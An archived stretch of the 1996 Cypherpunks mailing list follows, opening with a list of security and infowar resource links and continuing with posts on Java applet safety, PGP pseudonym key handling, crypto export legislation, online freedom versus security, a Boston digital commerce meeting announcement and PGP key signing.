- Computer Underground Digest (CUD) (an open forum
dedicated to sharing information among computerists and
to the presentation and debate of diverse views.) =>
http://www.utopia.com/mailings/cud/

- Cypherpunks archive by thread =>
http://infinity.nus.sg/cypherpunks/

- Best of Security List Archive by thread =>
http://www.connectnet.net.au/BoS/

- Forum On Risks To The Public In Computers And
Related Systems (Committee on Computers and Public
Policy, Peter G. Neumann, moderator  The RISKS Forum
is a moderated digest. Its USENET equivalent is
comp.risks) => http://catless.ncl.ac.uk/Risks/

- Privacy, Security, Crypto, Surveillance archive (from
EFF) http://www.eff.org/pub/Privacy/

===========
Conferences, Expositions
===========

- InfoWarCon '96 => http://www.ncsa.com/infowar1.html

- InfoWarCon (Europe) '96 ("Defining the European
Perspective" will be the theme of this year's InfoWarCon
to be held in Brussels, Belgium May 22 - 24, 1996.
Sponsors include National Computer Security Association;
Winn Schwartau, President and CEO, Interpact, Inc.; and
Robert David Steele, Chairman & CEO, Open Source
Solutions Group. Co-Sponsors include: IBM Internet
Security Systems; Jane's Information Group Network
Systems, Inc.; and Norman Data Defense. Overview:
Information Warfare represents a global challenge that
faces all late-industrial and information age nation states.
It also represents the easiest and cheapest way for less
developed nation-states and religious or political
movements to anonymously and grievously attack major
nations and international corporations. Not only are the
definitions of InfoWar unclear, but they span many areas
and disciplines. This conference will examine the
European perspectives on all three classes of Information
Warfare while contributing some American lessons
learned, mistakes made and successes enjoyed. The
conference will look at these three areas of interest: Class
I: Personal Privacy Class II: Industrial and Economic
Spying and Warfare Class III: Global Conflict, Terrorism
and the Military) => http://www.ncsa.com/iweuro96.html


===========
Infowar product vendors and service providers
===========

- enterWorks.com (Virtual DB)

- Omnisec International (Carries out security checks on
CIA agents.)

- Science Applications International Corporation (SAIC) =>
http://www.saic.com/copyright.html

- Security Dynamics, RSA Data Security =>
http://www.securid.com/ID104.4221/index.html


===========
Infowar, security products and services
===========

- Devices now in field testing with the U.S. Marines,
according to  Ellison C. Urban, Advanced Research
Projects Agency (ARPA) in his paper "The Information
Warrior"
(http://www.spectrum.ieee.org/publicaccess/1195inf1.html)
are described as follows:

The Tamer: The Tamer system consists of a global
positioning system (GPS) receiver, a liquid-crystal display
(LCD), thumb-input      devices, data ports, and software
for intelligence reports -- all in a single module integrated
with a standard-issue Melios laser rangefinder. In a future
version the LCD will be eliminated and a video capability
added; an intelligence report form filled out by the soldier
and automatically transmitted by a geopositioning satellite
will be superimposed on the scene through the viewfinder.

VoiceMap: Via the VoiceMap (or a similar system,
Pathfinder, shown on the Web site), the user's location is
fixed by a GPS receiver and then displayed on an
electronic map, where it is compared with the user's
itinerary. Maps can be scrolled or scaled with voice
commands, as well as updated with tactical data sent from
other units by radio link. In future, the attached computer
will have an artificial intelligence capability, permitting it to
respond to complex queries, such as "What is the best
route to way station Delta?"

VuMan: The VuMan is a body-hugging computer with an
easily manipulated circular dial that displays animations of
repair      procedures, replacing thousands of pages of
maintenance manuals. Soldiers simultaneously see both
their equipment and the computer information through a
head-up display.

MARSS: The  Maintenance and Repair Support System
(MARSS) is the first application planned for an electronic
vest called the bodyLAN, which provides a wireless local-
area network that interconnects with personnel and their
systems. A MARSS-equipped soldier wearing the vest can
walk up to a piece of equipment in need of repair -- a tank,
say -- and have it disgorge its self-diagnostics by radio to
the soldier's on-board computer. That computer, linked to
other devices, sorts the information and links up to
logistics stations in the rear or around the world. The
bodyLAN vest presents both potential benefits and
potential problems.).
The MARSS project is the first application of a central
element planned for all TIAs: a wireless local-area network
-- called a bodyLAN -- in a thin undervest to be worn by
every soldier. The vest will eliminate redundant electronic
components and link the remaining devices (and those of
other troops) via a common standard. But being in such
intimate contact, as it were, with such a device adds risks.

- Management Analytics Info-Sec Products (Products
listed in late April include the following: Internet Tester:
Internet Vulnerability Tests for Unix ... Tracer: Automated
Audit Software ... Daemons: Secure http and gopher
daemons ... ManAlMail: Sendmail reciever replacement ...
Tracker: Tracks Down Sites ... Access: Centralized SetUID
Program ... Menus: Secure Menu system and BBS ... One-
Time-Pass: Hardware-free one-time password schemes ...
Watcher: Watches and analyzes log files in real-time ...
Mantra: Generates and tests passwords ... Permit: Verifies
and corrects access control settings ... Checkers: Crypto-
checksum and other integrity checking systems ... Integrity
Toolkit: An integrity shell for Unix ... Shell Utilities: Useful
utilities for programming the shell) =>
http://all.net/products/top.html

- Semiomap a Tool to Monitor Internet (Claude Vogel,
CEO, claude.vogel@devinci.fr, fax +33 1 41377099,
Semio Corp., 137 S. Robertson Blvd. Suite 103, Beverly
Hills, CA 90211, USA, fax: +1 310 888 8785) =>
http://www.indigo-net.com/intel.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 30 Apr 1996 14:04:52 +0800
To: dcsb@ai.mit.edu
Subject: DCSB: Gold Denominated Burmese Opium Futures?
Message-ID: <v03006604adaae1031021@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Notice the *corrected* reservation deadline of May 4th, 1996, and the
meeting day of Monday instead of the usual Tuesday...
-RAH


-----BEGIN PGP SIGNED MESSAGE-----


                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                            Perry E. Metzger

         "Possible Futures: The Impact of Ubiquitous High Speed
               Networking on Intermediation and Regulation"

                                  or

        "With Spring Street Brewing shares trading on the web, are
            gold denominated Burmese opium futures inevitable?"



                        *Monday*, May 6, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



Perry Metzger is the President of Piermont Information Systems Inc.,
a consulting firm specializing in communications and computer
systems security. He has worked for, or consulted to, the New York
financial community for most of the last decade. He has been
strongly involved with the Internet Engineering Task Force's
security area for some time, and is the author of several security
related RFCs. He is also the co-chair of the IETF's Simple Public
Key Infrastructure working group, which is developing public key
cryptographic standards for the internet.

Networking technology is racing far ahead of culture. Fiber optics
offer the possibility of cheap truly ubiquitous internet service in
the tens of gigabits per second within the decade, and cheap high
speed mobile connectivity is also likely. We will likely live in a
world where anyone can sit in a park with a cheap laptop and
communicate over a multi-megabit per second channel to any other
civilized location on the planet. This development may radically
change our culture, and with it the nature of regulation and
intermediation in the marketplace. Although opium futures trading
might not be inevitable, the scope of the trends we are facing should
not be underestimated. Mr. Metzger will discuss these and similar
developments; he will also discuss the limits to our ability to
predict or alter the course such changes will take.



This meeting of the Digital Commerce Society of Boston will be held on
*Monday*, May 6, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

Please note that this meeting is on *Monday* this month, due to a scheduling
problem at the Harvard Club. We go back to meeting on the first Tuesday of
the month in June.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, May 4, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 June        Dan Shutzer      FSTC
 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYUw3PgyLN8bw6ZVAQGhqQQAkO9V9nCDK728Wbi6/niEWlViu8Lg6SKA
EuxUJYUxPSF1IQJ1v9PRs1R22+BdsROrTnYhunpwbz/keuYW1qMotnzfvwpgsI57
GEHWl5lefbTfo3v+11RZsjFUHaWTCUYLC5b3j1VwfclkWgw7iK89ou29lAIWNoZh
Er9ggqU8FDg=
=IeSs
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 30 Apr 1996 15:29:41 +0800
To: perry@piermont.com
Subject: Re: The Joy of Java
In-Reply-To: <199604270123.VAA01708@jekyll.piermont.com>
Message-ID: <199604292229.SAA08088@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:
>You can do that safely without making it dangerous for your machine. I
>know how I would build a restricted execution environment for such
>markets. However, Java is 1) too slow, since if you are selling
>rendering cycles or such you don't want to be running an interpreter,
>2) insufficently safe, and 3) paradoxically, insufficiently powerful
>for the sort of code you would want to run in such an environment.

The speed can be significantly addressed by compiling the byte-code to
local machine instructions, but given the sheer number of junk cycles
that are made available by letting a Java interpreter sell them, it
doesn't much matter for some applications.

I agree that Java is currently too unsafe.  The current Java model may
not even be salvageable (that being where I got in on this thread).
It's the concept embodied by Java (and it's many conceptual cousins,
Scheme, Safe-TCL, E, etc.) that I was talking about.

I don't understand what you mean by "insufficiently powerful".  It's as
expressively powerful as most high-level languages, and computationally
Turing equivalent.  It's lack of power seems entirely in the performance
arena, which may be solved, eventually.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 30 Apr 1996 14:35:44 +0800
To: bryce@digicash.com
Subject: Re: Bold Assertion: there are no Men in the Middle
In-Reply-To: <199604290915.LAA04182@digicash.com>
Message-ID: <199604292343.SAA21804@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Eavesdropping prevention is important, and is an important
feature that PGP provides.  If a MITM can subvert the privacy, but not
the authenticity of the data, PGP becomes pretty pathetic.

Adam

bryce@digicash.com wrote:

| I still have a strong intuition that I could keep my cash if
| I made such a proposal and gave it a few simple stipulations
| (such as that the attacker would have to forge important
| material in the victim's name rather than just use the
| attack to eavesdrop...).  The successful attacker would


-- 
It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 30 Apr 1996 14:21:53 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: The Joy of Java
In-Reply-To: <199604292229.SAA08088@universe.digex.net>
Message-ID: <199604292245.SAA10827@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> I don't understand what you mean by "insufficiently powerful".  It's as
> expressively powerful as most high-level languages, and computationally
> Turing equivalent.  It's lack of power seems entirely in the performance
> arena, which may be solved, eventually.

Java applications can't save files to disk or use data files on
disk. If you were, for instance, buying two CPU weeks of idle time on
some machines, you would need stuff like checkpointing or the ability
to save intermediate results.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 30 Apr 1996 15:30:24 +0800
To: steve@edmweb.com (Steve Reid)
Subject: Re: PGP and pseudonyms
In-Reply-To: <Pine.BSF.3.91.960429000141.11364B-100000@kirk.edmweb.com>
Message-ID: <199604292347.SAA21881@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The solution is to store your keys on an encrypted filesystem,
such as Cryptdisk or CFS.  Thus, possession of the keyrings does no
good, because they're encrypted.  I've found that leaving PGP on the
encrypted partition makes me less likely to get error messages like
'keyring unavailable,' and I do get the obvious: pgp: Command not
found


Adam

Steve Reid wrote:

| > > I suppose a temporary fix would be to not use an ordinary PGP passphrase,
| > > but rather encrypt the whole secring.pgp file. Decrypt it when you need
| > > it, and be very careful to properly clean up when you're done.
| > Huh?
| > Just use multiple secring.pgp files, and toggle PGPPATH. What's the
| > problem? 
| 
| You don't understand the problem we're concerned about... The problem is,
| the "real" person is in posession of the pseudonym's secret PGP key, and 
| PGP doesn't try to hide that fact.
| 
| Suppose John Doe is using the pseudonym "Evil Bastard". Naturally, he has
| a PGP key for his Evil Bastard identity. Now suppose someone gets into his
| computer. This person would be able to find Evil Bastard's secret key. 
| Fortunately, the snoop would not be able to use the key, since it would be
| encrypted with a secure PGP passphrase. However, they would still be able
| to use the command "pgp -kvv secring.pgp", and that shows the key ID of
| each secret key. 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Trauring <philip@cs.brandeis.edu>
Date: Tue, 30 Apr 1996 14:53:06 +0800
To: cypherpunks@toad.com
Subject: Re: WSJ on Crypto Push - Irony
In-Reply-To: <199604291431.KAA03328@pipe2.nyc.pipeline.com>
Message-ID: <v03006601adaaf856a406@[129.64.2.184]>
MIME-Version: 1.0
Content-Type: text/plain


>    Sen. Conrad Burns (R., Mont.) is expected to introduce
>    tomorrow a bill that would ease the federal government's
>    export rules. At the same time, industry-trade groups and
>    privacy advocates will seek grass-roots support via the
>    Internet.

Anyone else see the irony that the senator comes from Montana?

	Philip

--=--=====--=--=====--=--=====--=--=====--=--=====--=--
          Philip Trauring      philip@cs.brandeis.edu     617-736-6702
                 "knowledge is my addiction, information is my drug"
                              http://www.cs.brandeis.edu/~philip/
--=--=====--=--=====--=--=====--=--=====--=--=====--=--                






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Apr 1996 16:00:45 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <m0uDvBL-00097LC@pacifier.com>
Message-ID: <mm86mD267w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
> >CNN is reporting that Colby's canoe has been found on the Potomac and
> >Colby is missing.
>
> Don't tell me, let me guess:  The guy who rented the canoe to him has
> suddenly retired, and has been reportedly seen going on a Park Avenue
> shopping spree.  Right?

Jim, I don't find dumb jokes about dead people I liked particularly funny.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Tue, 30 Apr 1996 16:01:59 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and security
Message-ID: <199604300129.UAA19944@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 PM 4/28/96 -0700, you wrote:
>
>>No.  "Those who sacrifice security for freedom, will have neither" is
>>not consistent with Franklin's statement, nor is it true.  Security and
>>freedom are antithetical, and worse than that, security is always an
>>illusion.  But you can have your illusion, as long as you keep it out of
>>my life.  Censor yourself if you wish, but don't censor anything I might
>>want to look up.
>>

>The Internet may once have been one of those small close knit communities,
>small enough not to require law enforcement - although even then it had
>rules that had to be followed.  But that Internet is gone, and it will
>never return, because now its the biggest city in the world, and the
>history of the change from pastoral communities to urban life, to the
>development of nation states and power blocs is also the history of crime.
>And as the Internet grows, so will its security problems.
>
>My position is to seek a balance between the freedom of the individual and
>the security of the community.  My argument is that when the security of
>the community is threatened by the freedom of the individual, the community
>will always prioritise its safety.  

"When the security of the community is threatened by the freedom of the
individual?!"

>From what socio-political ideology do you run your group?

>Good government of course means
>maintaining individual freedoms *and* maintaining community security.  I
>actually disagree that they are antithetical.  On the contrary they are a
>balance that any society has to find.  Where individual freedom takes over
>you have the urban jungle where predators consume prey.  Where security
>takes over you have the totalitarian state.  Neither is necessary nor
>inevitable.

By the way government serves best when it serves least.

Remember that.

>We are simply concentrating on the problem from two different angles.  My
>concern is to maximise community safety while protecting individual
>freedom.  Your angle is to maximise individual freedom while protecting
>community safety.  There is IMHO very little difference between the two.

No there is a major difference, I feel society is served best when
each individual has the freedom to defend and protect themselves apposed
to what you want us to do in essence you want us to lay down those liberties 
to an outsied group who are supposed to protect us.  

The internet is not a city, it is a computer network that
spans the globe.  What you are asking for in analogy is not a cop walking
a city street but fucking U.N. tanks driving through neiborhoods enforcing
rights by way of brute force. 

>From what I have seen of what your group does you are as hypicritical as
law enforcement in your techniques and attacks on others.  Often unwarranted
and justified in the name of some supposed higher ideal.

PGP encrypted mail preferred.  
Scott J. Schryvers <schryver@radiks.net>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzFX9usAAAEH/2r2eovPAoYZbxzmfJ1DW7yjjdVnckXjUVKU/zZNAUV/IjzF
GDEq040wbAG1rFHDYoBOjjJTOGWMFuZ9apqoAvvI7Q4NAmVrNif0Rp8q/j4jib13
dlAA4Q0nvJZ5YNw4sf4r0iug76+9i0WpIZoP60DEB8BTuyCP55+nsbe7Ii3xLRyq
ThZ2fhNqK2hD/rFugXK29Ynyzuc6TuFfu78kVOsYUUbQpplXyaLjhGKN94pZ5jox
x7/wvqmBoH9E3rnaIPY9vOwy3kvMmCTlkjhlCzMXZHDn0e3UHWAax2mUTMttRzzi
+SUv45h6ua+eSwUkA8uojojn/JiPOKIPwPk3hq0ABRG0KFNjb3R0IEouIFNjaHJ5
dmVycyA8c2Nocnl2ZXJAcmFkaWtzLm5ldD4=
=58dK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 30 Apr 1996 17:47:00 +0800
To: cypherpunks@toad.com
Subject: Re: Mindshare and Java
Message-ID: <199604292357.QAA17206@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:56 PM 4/27/96 -0700, mrm@netcom.com (Marianne Mueller) wrote:
>One thing I don't understand, why do you trust signed code? 
>So you know the code is signed by Jack the Ripper.  so what?  How do 
>decide what you want the code to be allowed to do?   I think there's 
>nothing for it but a kind of limited capabilities model built on top
>of the authentication mechanism. 

Some code comes from random sources; signatures there mainly buy you 
the ability to blame someone if the code hoses your machine,
and thus reduces the chance that someone will hose you.

But as Java develops, there'll be more commercial code available;
I'd trust Java code signed by Microsoft just as much as I'd
trust any other Microsoft code I'm running on my machines.
Maybe more, given the quality of some of the Microsoft code I'm
running now :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 30 Apr 1996 16:59:38 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The Joy of Java
In-Reply-To: <199604292245.SAA10827@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960429203250.2355A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996, Perry E. Metzger wrote:

> 
> Java applications can't save files to disk or use data files on
> disk. If you were, for instance, buying two CPU weeks of idle time on
> some machines, you would need stuff like checkpointing or the ability
> to save intermediate results.

See the documentation for FileOutputStream; unsigned java applets can't 
make persistent changes, but signed ones can. Applications can always 
access the file system

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Tue, 30 Apr 1996 17:27:01 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: On computer face recognition:
Message-ID: <199604300335.UAA01760@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 PM 4/29/96 -0400, you wrote:
><< "Results were successful (else why write about it?" >>
>
>
>   Another believer in the tooth fairy. Send this kid to the "Real World 
>Academic Life"  bootcamp, please.

No (sigh) I'm not a believer in the tooth fairy, nor a kid.  I take the time
and trouble to post to the list something of bona-fide value and interest
and all you can do is snipe at some side-comment, tongue-in-cheek at that?
I see we're not talkin' bout a 1-percenter here, are we?   Let's see if you
can't do something more useful next time.
>
>Note that I am not making any comment on the success of this particular 
>work.

Probably because you haven't a clue.

>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 30 Apr 1996 17:19:07 +0800
To: cypherpunks@toad.com
Subject: WhoWhere.com v. that stanford.edu loon
Message-ID: <199604300342.UAA22910@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Several people asked for an update, so here it is.

WhoWhere.com has been provided a dump of the password file that they may
never have seen before, and they will be purging all 27,128 addresses
therein from its database. Of course, many of those addresses may also
be available from other, publicly available sources, and the Stanford
community has been made well aware of whowhere.com's service (for user
entries), so I expect that thousands of these addresses will return soon.

I am confident that the Parsec folks are now acting in good faith, and
that they are now sensitive to the relevant privacy and ethical issues.

Myself, I'm cognizant of the hypocrisy and foolishness inherent in my
position, but hey, we do what we can with what we got. Until the system
is fixed, I gotta defend my people the best I can.

I'm still reasonably serious about that "Hack Stanford Privacy" thing. If
there is an easy way for outsiders to glean our whole kerberos namespace
(outside of other major universities interconnected via AFS, and we'll
get that fixed Real Soon Now), I want to know about it.

- -rich
 [not on cypherpunks, so please Cc any responses]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYWLdo3DXUbM57SdAQF9fAP+Pw4ra8Q5JfDy/DnmfrDauP5/4x+sH+SY
qOwGk+GDgKW1p9yO+31OhuLsatPK5sXDGjTtwseRZXZXizylGmwQtgs2g9gQMxNR
feZLyo0WBVnYw600ppms7nfay0uqEjM25nw/z+HDrUZ7VlWuAXZ/yctqLadiO3P8
+vCGbDfSQWA=
=dP6F
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 30 Apr 1996 15:34:07 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [DETWEILING?] Re: The Iron Mountain Report
Message-ID: <199604300048.UAA28939@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 25, 1996 00:17:25, 'Rich Graves <llurch@networking.stanford.edu>'
wrote: 
 
 
>On second thought, this is so *obviously* a troll that it *must* be 
>intended to be obvious. Of course there are a lot of really stooooopid 
>Nazis out there, but this last round is too much. Did you see the one 
>about Smart Cards being the Mark of the Beast? Follow the URL that message

>gave -- it's even loonier than it looks.  
> 
 
The sense I have is that the highest liklihood is that it springs from a
standard run-of-the-mill loon on the conservative side of the spectrum. 
 
The net nazis are busy with far more creative trolls and the leftists have
no record of picking up on this particular report (since, if nothing else,
it was designed as a semi-humor piece when originally published in
hardcover.) 
 
It more reminds me of the space-alien kidnapping piece on "Penelope Kuntz"
from one of the fake newspapers that the _National Lampoon_ ran a few years
ago. It was picked up and reposted by some of the paranoids. 
 
>Only nobody@replay.com knows... 
> 
>Possibilities: 
> 
>1. Some anti-Nazi (such as Tallpaul -- note this is *not* an accusation!) 
>trying to make the Nazis look bad. 
> 
 
I didn't take it as an accusation. There's nothing wrong with running
through a complete(ish) list of hypotheses when working on a problem.
However, this hypothesis is not likely since: 
 
1) I don't think it came from nazis; 
2) I (modestly) think I can make the nazis "look bad" by quoting them, not
inventing trolls; 
3) I don't troll political issues for political reasons. (OK, the BABYLON-5
troll was sort of political but I thought the reference for people to "bite
my third secondary grasping tentacle" made it obvious but a couple of
left-wing dufuses still took it seriously). 
4) I am a generalist, without the detailed technical knowledge for really
good trolls. 
 
Similar arguments against your other hypotheses.  
 
>2. Some really, really stupid Nazi who doesn't realize that he looks bad 
>(if you don't believe sich people exist, look up just about any Usenet  
>post from Les Griswold or A HUBER). 
>3. Some Detweiler tentacle/clone trolling just for kicks. 
>4. Declan, trying to troll me. 
>5. Me, trying to troll Declan, or myself. 
> 
><pot-kettle-black=on> 
> 
>In any case, the person doing it is an asshole, and there is little call 
>for substantive replies. Don't feed the animals. 
> 
></pot-kettle-black> 
> 
>-rich 
> 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 30 Apr 1996 15:44:41 +0800
To: sameer@c2.org
Subject: Re: The Joy of Java
In-Reply-To: <199604292322.QAA25776@atropos.c2.org>
Message-ID: <199604300108.VAA10986@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sameer@c2.org writes:
> > Java applications can't save files to disk or use data files on
> > disk.
> 
> 	Uh, yes they can. It's the applets that can't.

Same difference -- we were talking about applets (or at least "safe
java" to coin a phrase) as a way of selling compute cycles.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 30 Apr 1996 15:42:24 +0800
To: cypherpunks@toad.com
Subject: DRAFT agenda for DC net-conference in early May
Message-ID: <IlVKVFu00YUzNGufRD@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recently saw a DRAFT agenda for a day-long Net-conference to be held
in early May, hosted by Congressmen Jack Fields and Rick White. Panels
include Future of the Internet, Electronic Commerce, Intellectual
Property, Law Enforcement and Encryption, and Education on the Net.
Highlights include a POSSIBLE luncheon address by The Honorable Newt
Gingrich.

Thought DC-area cypherpunks might like an advance heads-up.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Tue, 30 Apr 1996 15:40:22 +0800
To: cypherpunks@toad.com
Subject: Re: NOISE - AARMs (fwd)
Message-ID: <9604300117.AA25708@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


>	David Lesher writes:

> 
> 
> But there has been an easy defense against such for decades. 
> 
> You run ordinary phone wire from the transmitter + antenna X meters
> back to the bunker or whatever. Then you talk from there.
> 
	Another division of a company I did some consulting work for
makes a box that goes between the transmitter and control head of a
current generation tactical UHF satellite terminal  (LST-5 TACSAT) of
the type used by US military commanders in the field.  It connects the
control and talking part of the radio with the transmitter and antenna
via up to a mile of optical fiber cable with no metal conductors.  As
you can imagine, it is hard to use RF sniffing techniques to find the
command post at the other end of the fiber.


						Dave Emery
						die@die.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 30 Apr 1996 18:00:05 +0800
To: unicorn@schloss.li>
Subject: Re: arbiter/escrow agent for hire
Message-ID: <v02120d1eadab4107a3eb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 17:43 4/28/96, bryce@digicash.com wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
> Black Unicorn <unicorn@schloss.li> wrote:
>(> "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:)
>> >     IIRC, currently Black Unicorn doesn't have any signatures on
>> > his public key of others. Therefore, this requirement, while
>>understandable,
>> > could cause a bit of a difficulty in the current situation.
>>
>> Please obtain a copy of my current key by finger.
>
>
>Oh please.  My respect for Uni's acumen just decremented a
>couple of notches.  A 2048-bit key, and no signatures?
>Rather like a front door with welded plate armor and an open
>window, no?

We had once had a thread on the list that discussed if it makes sense to
sign keys for nyms you have never met. I think it does. Even seeing a
driver licencse isn't 100% proof that the name stated on the doccument is
the True Name of the person.

However, I am firmly convinced that the person using the PGP key
pub  2048/4E685D39 1995/03/26 Black Unicorn <unicorn@access.digex.net>
          Key fingerprint =  00 B9 28 9C 28 DC 0E 55  E1 6D 53 78 B8 1E 1C 96
is the same Black Unicorn that is frequently posting to Cyphperpunks.

Therefore, I am willing to sign his key.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQEPAy91JFIAAAEIALRKcL9qZZnqMn3fuDDxOd8+d2F+rqKB3Ff1U7+9Cp2CGugx
zfygey2nBEZQXiXG8fBi44iGAuHNc7TRRkQCr8srMwKXeU1Ue/fe5ACcDGy0H1ki
C0YYOuWFY2mtKCiqW3kcXWGFlDf418FbXftqJwSvMiIWIzgtepSWfzl5ApmguHjA
lTngdR+R557Cb6mgLV0Vug9yGyqXGeCqIs7Yx5SpakoIRwkkfniGa3m6L8+OgREY
bW6MoDPOfUox90xqJsDePB7b11l05I87V28s4FaTYH8CdmtdAun52/hLEAQKMXyz
g7jPlSQzpLObZ0OL3eiulHyC0aR4LWieb05oXTkAEQEAAbQoQmxhY2sgVW5pY29y
biA8dW5pY29ybkBhY2Nlc3MuZGlnZXgubmV0PokAlQMFEDGFkHEEkJHpt/K8BQEB
nXgEAIe4FNcBuzXHT3VR1jfLcL+5vbjSH6Cxv06vEhpV3UpZonpD8C9Y+Mv2YSea
iOV5aKf98xgRpGNqxuofkDsQu9fJPJizOaFQFEFJXbjT/NcnzYKBFDX3XyDF45Uq
n6OM9t5ysRQOCPMzRlf05tu48qVwpx3qSU4yWDok3F6hQhMuiQEVAwUQL3VAdC1o
nm9OaF05AQH/oAgAp/ZME1rM4o2lnKRuI/n+IrrBZVMrB59tzgpDzt0KNoOkIRsE
